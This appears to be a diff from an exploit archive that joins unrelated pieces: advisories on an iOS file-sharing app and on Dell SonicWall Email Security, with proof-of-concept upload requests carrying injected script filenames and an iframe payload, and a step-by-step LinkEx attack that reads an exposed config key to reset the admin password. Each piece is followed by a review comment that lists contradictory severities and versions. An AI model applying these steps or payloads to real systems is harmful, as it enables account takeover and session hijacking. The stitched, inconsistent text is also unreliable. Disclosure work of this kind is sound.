the local command/path inject vulnerability is estimated as high with a cvss (common vulnerability scoring system) count of 6.3(+)|(-)6.4.
Exploitation of the command/path inject vulnerability requires a low privileged iOS device account with restricted access and no user interaction.
Successful exploitation of the vulnerability results in unauthorized execution of system specific commands and unauthorized path value requests to
compromise the mobile iOS application or the connected device components.
Request Method(s):
[+] Sync [POST]
Vulnerable Parameter(s):
[+] foldername (path value)
Affected Module(s):
[+] ./[iPhone]/Sub Category x - File Dir Listing
1.3
A remote denial of service web vulnerability has been discovered in the official Easiermobile Inc - ePhone Disk v1.0.2 iOS mobile web-application.
A denial of service vulnerability allows remote attackers to block, freeze or crash the affected or vulnerable mobile online-service application.
The vulnerability is located in the vulnerable `[download]` value of the downloads module. Local attackers are able to include tags as download
path value via GET method request. The application responds with an unhandled exception and the result is a permanent online-service and
application crash. The security risk of the remote denial of service web vulnerability is estimated as low(+) with a cvss (common vulnerability
scoring system) count of 1.8(+)|(-)1.9.
Exploitation of the denial of service web vulnerability requires no privileged iOS device account but low user interaction (allow|accept).
Successful exploitation of the DoS vulnerability results in unauthorized execution of system specific commands and unauthorized path value
requests to compromise the mobile iOS application or the connected device components.
Request Method(s):
[+] [GET]
Vulnerable Parameter(s):
[+] ?download
Proof of Concept (PoC):
=======================
1.1
The local file include web vulnerability can be exploited by local attackers with low user interaction and with low privileged web-interface account.
For security demonstration or to reproduce the security vulnerability follow the provided information and steps below to continue.
PoC: Upload File > Name > [Index File Dir List]
<table xmlns="http://www.w3.org/1999/xhtml"><thead><th class="icon"/><th class="name">Name</th><th class="modifieddate">Date Modified</th>
<th class="size">Size</th><th/></thead><tbody><tr><td class="icon"><a href=".."><img src="/static/backToParent_icon.png"/></a></td>
<td class="name"><a href="..">Parent Directory</a></td><td class="modifieddate"/><td class="size"/><td/></tr><tr><td class="icon">
<a href="/iPhone/Downloads/./[LOCAL FILE INCLUDE VULNERABILITY!].png">
<img src="/iPhone/Downloads/./[LOCAL FILE INCLUDE VULNERABILITY!].png?thumbnail=1"/></a></td>
<td class="name"><a href="/iPhone/Downloads/./[LOCAL FILE INCLUDE VULNERABILITY!].png">./[LOCAL FILE INCLUDE VULNERABILITY!].png</a></td>
<td class="modifieddate">2014-03-19 14:09</td><td class="size">538 bytes</td>
<td class="download"><a href="/iPhone/Downloads/./[LOCAL FILE INCLUDE VULNERABILITY!].png?download=1">
download</a></td></tr></tbody></table>
--- PoC Sesion Logs [POST] ---
Status: 200[OK]
POST http://localhost:8080/iPhone/Downloads?upload=1 Load Flags[LOAD_DOCUMENT_URI LOAD_INITIAL_DOCUMENT_URI ] Gr??e des Inhalts[0] Mime Type[text/plain]
Request Header:
Host[localhost:8080]
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:27.0) Gecko/20100101 Firefox/27.0]
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
Accept-Language[de-de,de;q=0.8,en-us;q=0.5,en;q=0.3]
Accept-Encoding[gzip, deflate]
Referer[http://localhost:8080/iPhone/Downloads]
Connection[keep-alive]
POST-Daten:
POST_DATA[-----------------------------57142047116429
Content-Disposition: form-data; name="file"; filename="./[LOCAL FILE INCLUDE VULNERABILITY!].png"
Content-Type: image/png
1.2
The command inject web vulnerability can be exploited by local attackers with low user interaction and low privileged web-application user account.
For security demonstration or to reproduce the security vulnerability follow the provided information and steps below to continue.
PoC: Foldername > Name > [Index File Dir List]
<table xmlns="http://www.w3.org/1999/xhtml"><thead><th class="icon"></th><th class="name">Name</th>
<th class="modifieddate">Date Modified</th><th class="size">Size</th><th/></thead><tbody><tr><td class="icon">
<a><img src="/static/GenericFolderIcon.png"/></a></td><td class="name"><a href="/iPhone/[LOCAL COMMAND INJECTION VULNERABILITY!]>
[LOCAL COMMAND INJECTION VULNERABILITY!]">iPhone/[LOCAL COMMAND INJECTION VULNERABILITY!]</a></td><td class="modifieddate">2014-03-19 14:11</td>
<td class="size">--
</td><td class="download"/></tr></tbody></table>
1.3
The denial of service web vulnerability can be exploited by remote attackers with low user interaction (allow|accept).
For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue.
PoC:
http://localhost:8080/iPhone/Downloads/[FileName].*?download=[REMOTE DENIAL OF SERVICE VULNERABILITY!]
Note: After the accept of the device owner the application permanent crashes.
A encode problem returns with an error which results in a crash via memory corruption.
Solution - Fix & Patch:
=======================
1.1
The first vulnerability can be patched by a secure parse of the filename value in the upload file module POST method request.
Encode also the output file dir index list with the vulnerable filename output value to prevent injection of malicious context.
1.2
The first vulnerability can be patched by a secure parse of the folder name value in the app sync module POST method request.
Encode also the output file dir index list with the vulnerable folder name output value to prevent injection of malicious context.
1.3
Restrict the download value to integer and allocate the memory. Implement an own little exception-handling to prevent remote denial of service attacks.
Security Risk:
==============
1.1
The security risk of the local file include vulnerability is estimated as critical.
1.2
The security risk of the local command inject vulnerability via phone foldername sync is estimated as high.
1.3
The security risk of the remote denial of service vulnerability is estimated as low(+).
Credits & Authors:
==================
Vulnerability Laboratory [Research Team] - LariX4 (research@evolution-sec.com) [www.vulnerability-lab.com]
Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties,
either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-
Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business
profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some
states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation
may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases
or trade with fraud/stolen material.
Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com
Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com
Section: www.vulnerability-lab.com/dev - forum.vulnerability-db.com - magazine.vulnerability-db.com
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php
Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory.
Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other
media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and
other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed),
modify, use or edit our material contact (admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission.
Copyright ? 2014 | Vulnerability Laboratory [Evolution Security]
--
VULNERABILITY LABORATORY RESEARCH TEAM
DOMAIN: www.vulnerability-lab.com
CONTACT: research@vulnerability-lab.com
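Review bot: the severity figures in this advisory contradict each other: the CVSS header gives 6.9, section 1.1 of Technical Details rates the filename issue "high(+)" at 6.8(+)|(-)6.9, and the Security Risk section calls the same issue "critical"; settle on one rating per issue. Section 1.3's impact sentence ("results in unauthorized execution of system specific commands and unauthorized path value requests") is copied from 1.2 and does not describe a denial of service; it should state the application crash the PoC note describes. Solution 1.2 opens with "The first vulnerability" although it covers the foldername sync issue, and "Exploitation Technique: Local" does not match 1.3, which the text calls remote. The 1.1 PoC shows the uploaded filename "./[...]" stored verbatim and echoed into the listing's href and link text, which supports an unsanitized-filename finding, but nothing in the log shows a file outside the upload directory being read, so the "local file include" classification needs a request that demonstrates that or should be renamed. Minor: "occcurs", "Sesion Logs", and the mojibake "Gr??e des Inhalts" and "Copyright ?" (the neighbouring advisories keep "Größe" and "©").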


@ -0,0 +1,318 @@
Document Title:
===============
Dell SonicWall EMail Security Appliance Application v7.4.5 - Multiple Vulnerabilities
References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1191
Dell (SonicWall) Security Bulletin: http://www.sonicwall.com/us/shared/download/Support-Bulletin_Email-Security_Scripting_Vulnerability__Resolved_in__ES746.pdf
Release Date:
=============
2014-03-26
Vulnerability Laboratory ID (VL-ID):
====================================
1191
Common Vulnerability Scoring System:
====================================
3.5
Product & Service Introduction:
===============================
While most businesses now have some type of anti-spam protection, many must deal with cumbersome
management, frustrated users, inflexible solutions, and a higher-than-expected total cost of ownership.
SonicWALL® Email Security can help. Elegantly simple to deploy, manage and use, award-winning SonicWALL
Email Security solutions employ a variety of proven and patented technology designed to block spam and
other threats effectively, easily and economically. With innovative protection techniques for both
inbound and outbound email plus unique management tools, the Email Security platform delivers superior
email protection today—while standing ready to stop the new attacks of tomorrow.
SonicWALL Email Security can be flexibly deployed as a SonicWALL Email Security Appliance, as a software
application on a third party Windows® server, or as a SonicWALL Email Security Virtual Appliance in a
VMW® environment. The SonicWALL Email Security Virtual Appliance provides the same powerful protection as a
traditional SonicWALL Email Security appliance, only in a virtual form, to optimize utilization,
ease migration and reduce capital costs.
(Copy of the Vendor Homepage: http://www.sonicwall.com/us/products/Anti-Spam_Email_Security.html)
Abstract Advisory Information:
==============================
The Vulnerability Laboratory Research Team discovered multiple persistent input validation vulnerabilities in the official Dell SonicWall EMail Security Appliance v7.4.6 Web-Application.
Vulnerability Disclosure Timeline:
==================================
2014-02-07: Researcher Notification & Coordination (Benjamin Kunz Mejri)
2014-02-08: Vendor Notification (Dell Security Team)
2014-02-14: Vendor Response/Feedback (Dell Security Team)
2014-03-25: Vendor Fix/Patch (SonicWall Developer Team)
2014-03-26: Public Disclosure (Vulnerability Laboratory)
Discovery Status:
=================
Published
Affected Product(s):
====================
DELL SonicWall
Product: EMail Security Appliance Application 7.4.5.1393
Exploitation Technique:
=======================
Remote
Severity Level:
===============
Medium
Technical Details & Description:
================================
Multiple persistent input validation web vulnerabilities has been discovered in the official Dell SonicWall EMail Security Appliance v7.4.6 Web-Application.
The vulnerability allows remote attackers or low privileged user accounts to inject own malicious script codes via POST method request to compromise the
application or user session data/information.
The first vulnerability is located in the `filename` value of the `settings_advanced.html` file. Remote attackers and low privileged application user accounts
are able to inject own malicious script codes to the application-side of the `Advanced Settings - Patch hochladen > Patch-Datei` module. Attackers can manipulate
the file upload POST method request by tampering the session. Next to tampering the session the attacker exchange the file name with a malicious script code
as payload. In the next step the website reloads the next firmware upgrade page (wait.html) with the file details. The execute of the injected script code
via POST method request occurs at the location of the listed file name value. The security risk of the persistent validation web vulnerability is estimated
as medium with a cvss (common vulnerability scoring system) count of 3.5(-).
The second vulnerability is located in the file name value of the settings_upload_dlicense.html file. Remote attackers and low privileged application user accounts
are able to inject own malicious script codes to the application-side of the Lizenz Verwaltung - Lizenzen Upload module. The request method is POST and the attack
vector is persistent. The execute occurs in the exception context of the license update page module. The security risk of the persistent validation web
vulnerability is estimated as medium with a cvss (common vulnerability scoring system) count of 3.0(+).
Exploitation of both vulnerabilities requires to bypass the regular validation of the web application appliance. To bypass the filter remote attackers can inject two
payloads with a split in the middle. The validation encodes the first injected payload and the second after the split executes the code.
Exploitation of the remote web vulnerabilities requires a privileged user account without user interaction or a remote user with medium to high user interaction.
Successful exploitation of the persistent web vulnerabilities results in session hijacking, persistent external redirects, persistent phishing and persistent
manipulation of vulnerable connected or affected modules.
Request Method:
[+] POST
Vulnerable Module:
[+] Advanced Settings - Patch hochladen > Patch-Datei (settings_advanced.html)
[+] Lizenz Verwaltung - Lizenzen Upload > (settings_upload_dlicense.html)
Vulnerable Parameter(s):
[+] file name
Affected Module(s):
[+] Firmware Update - Waiting Page (wait.html)
[+] License Update Page (exception)
Affected Version(s):
[+] 7.4.6
Affected Appliance Model(s):
[+] Dell SonicWall EMail Security Appliance Web Application - All Models
Proof of Concept (PoC):
=======================
The two persistent input validation web vulnerabilities can be exploited by remote attackers with low privileged email security application user account and
low user interaction or without privileged web-application user account on client-side via POST inject. For security demonstration or to reproduce the
vulnerability follow the provided information and steps below.
URL: Input
http://ess.localhost:8619/settings_advanced.html
URL: Execute
http://ess.localhost:8619/wait.html
PoC: Firmware Update - Status Waiting Site
<div style="border-radius: 10px;" class="warning_bubble_content">
<div class="bubble_title">Die Firmware wird aktualisiert...</div>
<div class="bubble_text">
<div id="updaterMessage">
Installationsdateien werden vorbereitet. Starten Sie keine Dienste neu!
<div class="alert">Email Security ist immer noch mit der Verarbeitung von E-Mails beschäftigt.</div>
</div>
<div>Aktuelle Produktversion von Email Security 7.4.5.1393.</div>
<div>Upgrade mit >>"%20<[PERSISTENT INJECTED SCRIPT CODE!]>.jpg.</div>
<br>
<div><div class="dotdot lefthand"></div></div>
<div>Abgelaufene Zeit: <span id="updateMS">00:00:36</span></div>
<div id="installProgressText" class="tail_trail"></div>
</div>
</div>
--- PoC Session Logs [POST] ---
Status: 302[Moved Temporarily]
POST http://ess.localhost:8619/settings_advanced.html Load Flags[LOAD_DOCUMENT_URI LOAD_INITIAL_DOCUMENT_URI ] Größe des Inhalts[0] Mime Type[text/html]
Request Header:
Host[esserver.demo.sonicwall.com]
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:26.0) Gecko/20100101 Firefox/26.0]
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
Accept-Language[de-de,de;q=0.8,en-us;q=0.5,en;q=0.3]
Accept-Encoding[gzip, deflate]
Referer[http://esserver.demo.sonicwall.com/settings_advanced.html]
Cookie[s_cc=true; s_sq=%5B%5BB%5D%5D; JSESSIONID=48D1C2695CBD91CAAA187C5A9DFFD5DC]
Connection[keep-alive]
POST-Daten:
POST_DATA[-----------------------------213272019431414
Content-Disposition: form-data; name="sortFiles"
false
-----------------------------213272019431414
Content-Disposition: form-data; name="smtpBanner"
><><iframe src=http://www.vulnerability-lab.com/> ;)
-----------------------------213272019431414
Content-Disposition: form-data; name="receivedBy"
-----------------------------213272019431414
Content-Disposition: form-data; name="dnsTimeout"
2
-----------------------------213272019431414
Content-Disposition: form-data; name="fullHistoryAgeDays"
10
-----------------------------213272019431414
Content-Disposition: form-data; name="whiteListSelf"
true
-----------------------------213272019431414
Content-Disposition: form-data; name="fullHistoryInbound"
false
-----------------------------213272019431414
Content-Disposition: form-data; name="fullHistoryOutbound"
false
-----------------------------213272019431414
Content-Disposition: form-data; name="logLevel"
fatal
-----------------------------213272019431414
Content-Disposition: form-data; name="dbAging"
366
-----------------------------213272019431414
Content-Disposition: form-data; name="snmpOn"
true
-----------------------------213272019431414
Content-Disposition: form-data; name="snmpComStr"
snwl>>"%20<[PERSISTENT INJECTED SCRIPT CODE!]>.jpg
-----------------------------213272019431414
Content-Disposition: form-data; name="uploadPatch"; filename=>>"%20<[PERSISTENT INJECTED SCRIPT CODE!]>.jpg"
Content-Type: image/jpeg
1.2
URL: Input
http://ess.localhost:8619/settings_dlicense.html
URL: Execute
http://ess.localhost:8619/settings_upload_dlicense.html
--- PoC Session Logs [POST] ---
Status: 200[OK]
POST http://ess.localhost:8619/settings_upload_dlicense.html Load Flags[LOAD_DOCUMENT_URI LOAD_INITIAL_DOCUMENT_URI ] Größe des Inhalts[-1] Mime Type[text/html]
Request Header:
Host[esserver.demo.sonicwall.com]
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:26.0) Gecko/20100101 Firefox/26.0]
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
Accept-Language[de-de,de;q=0.8,en-us;q=0.5,en;q=0.3]
Accept-Encoding[gzip, deflate]
Referer[http://esserver.demo.sonicwall.com/settings_upload_dlicense.html]
Cookie[s_cc=true; s_sq=%5B%5BB%5D%5D;
JSESSIONID=48D1C2695CBD91CAAA187C5A9DFFD5DC; __utma=227649090.1810522928.
1391719457.1391719457.1391719457.1; __utmb=227649090.2.10.1391719457; __utmc=227649090; __utmz=227649090.1391719457.1.
1.utmcsr=esserver.demo.sonicwall.com|utmccn=(referral)|utmcmd=referral|utmcct=/settings_branding.html; __utmv=227649090.|
1=User%3AUnkown=Unknown=1; s_vi=[CS]v1|2979FA11051D0AC5-40000137600ADB77[CE]]
Connection[keep-alive]
POST-Daten:
POST_DATA[-----------------------------281841889227097
Content-Disposition: form-data; name="uploadLicenses"; filename=">>"%20<[PERSISTENT INJECTED SCRIPT CODE!]>.jpg"
Content-Type: image/jpeg
Solution - Fix & Patch:
=======================
Both vulnerabilities can be patched by a secure parse and encode of the file name value in the 2 affected upload POST method requests.
Filter and encode also in the wait.html and license exception the vulnerable output values even if the input is still parsed.
SonicWall Solution:
============
We recommend existing users of Dell SonicWALL Email Security upgrade to version 7.4.6 to prevent this cross-site script injection from being executed by unauthorized users.
Email Security 7.4.6 is available for download from www.mysonicwall.com. Users should log into mySonicWALL and click on Downloads > Download Center in the navigation panel
in the left-hand navigation, then select “Email Security” in the Software Type drop down menu.
Security Risk:
==============
The security risk of the persistent and non persistent post inject web vulnerabilities are estimated as medium.
Credits & Authors:
==================
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com) [www.vulnerability-lab.com]
Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties,
either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-
Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business
profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some
states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation
may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases
or trade with fraud/stolen material.
Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com
Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com
Section: www.vulnerability-lab.com/dev - forum.vulnerability-db.com - magazine.vulnerability-db.com
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php
Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory.
Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other
media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and
other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed),
modify, use or edit our material contact (admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission.
Copyright © 2014 | Vulnerability Laboratory [Evolution Security]
--
VULNERABILITY LABORATORY RESEARCH TEAM
DOMAIN: www.vulnerability-lab.com
CONTACT: research@vulnerability-lab.com
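Review bot: the affected version is inconsistent across the entry: the title and "Affected Product(s)" say 7.4.5 (build 7.4.5.1393, which the PoC page also shows as "Aktuelle Produktversion von Email Security 7.4.5.1393"), while the abstract, Technical Details and "Affected Version(s)" say 7.4.6, the release the vendor solution names as the fix. Change the three 7.4.6 references to 7.4.5 so the fixed version is not listed as affected. The "Security Risk" line speaks of "persistent and non persistent" vulnerabilities, but the text documents only persistent ones. The first session log also carries payloads in the smtpBanner and snmpComStr fields next to the uploadPatch filename; if those fields are not part of the finding they should be blanked, otherwise list them under Vulnerable Parameter(s). The uploadPatch header in the first log is unquoted (filename=>>"...) while the second log quotes it (filename=">>"...), so the first multipart header is malformed as shown. Grammar: "Multiple ... vulnerabilities has been discovered", "The execute occurs". The "SonicWall Solution:" underline is shorter than its heading, unlike every other heading in the file.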

platforms/php/webapps/32561.txt Executable file

@ -0,0 +1,28 @@
# Exploit Title: LinEx All Versions Password Reset Vulnerability
# Google Dork: linkex.dk 2006-2011
# Date: 15/01/2014
# Exploit Author: N B Sri Harsha ( Reconnect Gray hat )
# Vendor Homepage: http://linkex.dk/
# Software Link: http://linkex.dk/releases/linkex.20120508.zip
# Version: All Versions
LinkEx Is A Open Source Web Application For Exchanging link , Which Most
Of The Porn Sites Uses it ,
1) First GO Here http://site.com/linkex/?page=admin
2) Click On Forgot password and enter the captcha
3) Go Here >> site.com/linkex/data/config/config
Note down the " key " parameter
ie :- "key";s:32:"36d1dd98c84e643236216449e96bed0d"
4) Now Use the Key Here >> site.com/linkex/?page=resetpassword&key=[key]
5) Thats It U Will Asked For New Username And Password
Shouts to :- | ROHIT ROY | GRAY CODE | Moni HBH | Yamraaj | HALK | Le3to |
HaXarwOw | COSMO | 404 !-!@!2$!-!@ | Root Breaker | N3O | Godhacker |
3QUIVOR | Dmostwanted | r00t.hc0n | hun73r_ihos |
--
Regards
N B Sri Harsha
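Review bot: the root cause is never stated: step 3 works because data/config/config, which holds the serialized "key" that resetpassword accepts in step 4, is readable straight from the web root, so the defect is an unprotected configuration file rather than the reset flow itself, and the entry offers no remediation (deny web access to the data/ directory, or keep the config and reset tokens outside the document root). The title says "LinEx" while the vendor URL and every step say "LinkEx"; "Google Dork: linkex.dk 2006-2011" reads like a footer string rather than a search query; and "Version: All Versions" is asserted without naming the release tested, although the Software Link points at linkex.20120508. Step 5 should read "That's it, you will be asked for a new username and password".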